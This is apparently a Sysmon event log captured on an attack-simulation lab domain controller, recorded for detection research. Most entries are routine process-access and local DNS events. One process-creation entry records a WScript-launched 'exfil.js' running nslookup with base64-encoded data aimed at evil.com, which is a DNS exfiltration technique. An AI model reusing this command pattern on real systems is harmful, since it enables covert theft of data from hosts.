14:16:41.579{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-9841-000000005F02}8160C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.564{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-9841-000000005F02}8160C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.564{2E1864BB-17C9-629A-9841-000000005F02}81606244C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9741-000000005F02}7852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.548{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9841-000000005F02}8160C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000203287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.063{00000000-0000-0000-0000-000000000000}6084<unknown process>-udpfalsefalse127.0.0.1-52993-false127.0.0.1-53domain 354300x8000000000000000203286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.063{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52993- 354300x8000000000000000203285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.063{00000000-0000-0000-0000-000000000000}6084<unknown process>-udptruefalse127.0.0.1-52993-false127.0.0.1-53domain 354300x8000000000000000203284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.063{00000000-0000-0000-0000-000000000000}6084<unknown process>-udpfalsefalse127.0.0.1-52992-false127.0.0.1-53domain 354300x8000000000000000203283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.062{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52992- 354300x8000000000000000203282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.062{00000000-0000-0000-0000-000000000000}6084<unknown process>-udptruefalse127.0.0.1-52992-false127.0.0.1-53domain 354300x8000000000000000203281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.062{00000000-0000-0000-0000-000000000000}6084<unknown process>-udpfalsefalse127.0.0.1-52991-false127.0.0.1-53domain 354300x8000000000000000203280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.062{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52991- 354300x8000000000000000203279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.062{00000000-0000-0000-0000-000000000000}6084<unknown process>-udptruefalse127.0.0.1-52991-false127.0.0.1-53domain 354300x8000000000000000203278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.000{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52990- 354300x8000000000000000203277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.000{00000000-0000-0000-0000-000000000000}1636<unknown process>-udptruefalse127.0.0.1-52990-false127.0.0.1-53domain 354300x8000000000000000203276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.000{00000000-0000-0000-0000-000000000000}1636<unknown process>-udpfalsefalse127.0.0.1-52989-false127.0.0.1-53domain 10341000x8000000000000000203275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.548{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9741-000000005F02}7852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000203274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.000{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52989- 354300x8000000000000000203273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.000{00000000-0000-0000-0000-000000000000}1636<unknown process>-udptruefalse127.0.0.1-52989-false127.0.0.1-53domain 354300x8000000000000000203272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.999{00000000-0000-0000-0000-000000000000}1636<unknown process>-udpfalsefalse127.0.0.1-52988-false127.0.0.1-53domain 354300x8000000000000000203271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.999{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52988- 354300x8000000000000000203270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.999{00000000-0000-0000-0000-000000000000}1636<unknown process>-udptruefalse127.0.0.1-52988-false127.0.0.1-53domain 10341000x8000000000000000203269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.548{2E1864BB-17A1-629A-783D-000000005F02}55526044C:\Windows\System32\WScript.exe{2E1864BB-17C9-629A-9741-000000005F02}7852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.548{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.928{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52987- 10341000x8000000000000000203266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.548{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{00000000-0000-0000-0000-000000000000}6888<unknown process>-udpfalsefalse127.0.0.1-52986-false127.0.0.1-53domain 354300x8000000000000000203264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52986- 10341000x8000000000000000203263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.548{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.548{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.549{2E1864BB-17C9-629A-9741-000000005F02}7852C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrln.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000203260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{00000000-0000-0000-0000-000000000000}6888<unknown process>-udptruefalse127.0.0.1-52986-false127.0.0.1-53domain 354300x8000000000000000203259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{00000000-0000-0000-0000-000000000000}6888<unknown process>-udpfalsefalse127.0.0.1-52985-false127.0.0.1-53domain 354300x8000000000000000203258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52985- 23542300x8000000000000000203257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.545{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvznpc.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000203256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{00000000-0000-0000-0000-000000000000}6888<unknown process>-udptruefalse127.0.0.1-52985-false127.0.0.1-53domain 354300x8000000000000000203255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{00000000-0000-0000-0000-000000000000}6888<unknown process>-udpfalsefalse127.0.0.1-52984-false127.0.0.1-53domain 354300x8000000000000000203254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52984- 354300x8000000000000000203253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{00000000-0000-0000-0000-000000000000}6888<unknown process>-udptruefalse127.0.0.1-52984-false127.0.0.1-53domain 354300x8000000000000000203252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.756{00000000-0000-0000-0000-000000000000}6408<unknown process>-udpfalsefalse127.0.0.1-52983-false127.0.0.1-53domain 354300x8000000000000000203251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.756{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52983- 354300x8000000000000000203250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.756{00000000-0000-0000-0000-000000000000}6408<unknown process>-udptruefalse127.0.0.1-52983-false127.0.0.1-53domain 354300x8000000000000000203249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.756{00000000-0000-0000-0000-000000000000}6408<unknown process>-udpfalsefalse127.0.0.1-52982-false127.0.0.1-53domain 354300x8000000000000000203248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.756{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52982- 354300x8000000000000000203247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.756{00000000-0000-0000-0000-000000000000}6408<unknown process>-udptruefalse127.0.0.1-52982-false127.0.0.1-53domain 354300x8000000000000000203246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.755{00000000-0000-0000-0000-000000000000}6408<unknown process>-udpfalsefalse127.0.0.1-52981-false127.0.0.1-53domain 354300x8000000000000000203245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.755{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52981- 354300x8000000000000000203244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.754{00000000-0000-0000-0000-000000000000}6408<unknown process>-udptruefalse127.0.0.1-52981-false127.0.0.1-53domain 354300x8000000000000000203243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.650{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56353-false10.0.1.12-8000- 354300x8000000000000000203242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.623{00000000-0000-0000-0000-000000000000}5088<unknown process>-udpfalsefalse127.0.0.1-52980-false127.0.0.1-53domain 354300x8000000000000000203241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.623{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52980- 354300x8000000000000000203240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.621{00000000-0000-0000-0000-000000000000}5088<unknown process>-udpfalsefalse127.0.0.1-52979-false127.0.0.1-53domain 354300x8000000000000000203239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.621{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52979- 354300x8000000000000000203238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.621{00000000-0000-0000-0000-000000000000}5088<unknown process>-udptruefalse127.0.0.1-52979-false127.0.0.1-53domain 354300x8000000000000000203237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.621{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52978- 354300x8000000000000000203236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.621{00000000-0000-0000-0000-000000000000}5088<unknown process>-udptruefalse127.0.0.1-52978-false127.0.0.1-53domain 354300x8000000000000000203235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.494{00000000-0000-0000-0000-000000000000}6140<unknown process>-udpfalsefalse127.0.0.1-52977-false127.0.0.1-53domain 354300x8000000000000000203234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.494{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52977- 354300x8000000000000000203233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.494{00000000-0000-0000-0000-000000000000}6140<unknown process>-udptruefalse127.0.0.1-52977-false127.0.0.1-53domain 354300x8000000000000000203232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.493{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52976- 354300x8000000000000000203231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.491{00000000-0000-0000-0000-000000000000}6140<unknown process>-udpfalsefalse127.0.0.1-52975-false127.0.0.1-53domain 354300x8000000000000000203230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.491{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52975- 354300x8000000000000000203229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.491{00000000-0000-0000-0000-000000000000}6140<unknown process>-udptruefalse127.0.0.1-52975-false127.0.0.1-53domain 354300x8000000000000000203228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.371{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52974- 354300x8000000000000000203227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.371{00000000-0000-0000-0000-000000000000}2932<unknown process>-udptruefalse127.0.0.1-52974-false127.0.0.1-53domain 354300x8000000000000000203226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.370{00000000-0000-0000-0000-000000000000}2932<unknown process>-udpfalsefalse127.0.0.1-52973-false127.0.0.1-53domain 354300x8000000000000000203225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.370{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52973- 354300x8000000000000000203224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.370{00000000-0000-0000-0000-000000000000}2932<unknown process>-udpfalsefalse127.0.0.1-52972-false127.0.0.1-53domain 354300x8000000000000000203223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.370{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52972- 354300x8000000000000000203222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.370{00000000-0000-0000-0000-000000000000}2932<unknown process>-udptruefalse127.0.0.1-52972-false127.0.0.1-53domain 10341000x8000000000000000203221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.495{2E1864BB-17C9-629A-9541-000000005F02}25164248C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9641-000000005F02}2668C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.285{00000000-0000-0000-0000-000000000000}7384<unknown process>-udpfalsefalse127.0.0.1-52971-false127.0.0.1-53domain 354300x8000000000000000203219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.285{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52971- 354300x8000000000000000203218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.285{00000000-0000-0000-0000-000000000000}7384<unknown process>-udptruefalse127.0.0.1-52971-false127.0.0.1-53domain 354300x8000000000000000203217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.152{00000000-0000-0000-0000-000000000000}7560<unknown process>-udpfalsefalse127.0.0.1-52970-false127.0.0.1-53domain 354300x8000000000000000203216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.152{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52970- 354300x8000000000000000203215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.151{00000000-0000-0000-0000-000000000000}7560<unknown process>-udptruefalse127.0.0.1-52970-false127.0.0.1-53domain 354300x8000000000000000203214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.151{00000000-0000-0000-0000-000000000000}7560<unknown process>-udpfalsefalse127.0.0.1-52969-false127.0.0.1-53domain 354300x8000000000000000203213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.151{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52969- 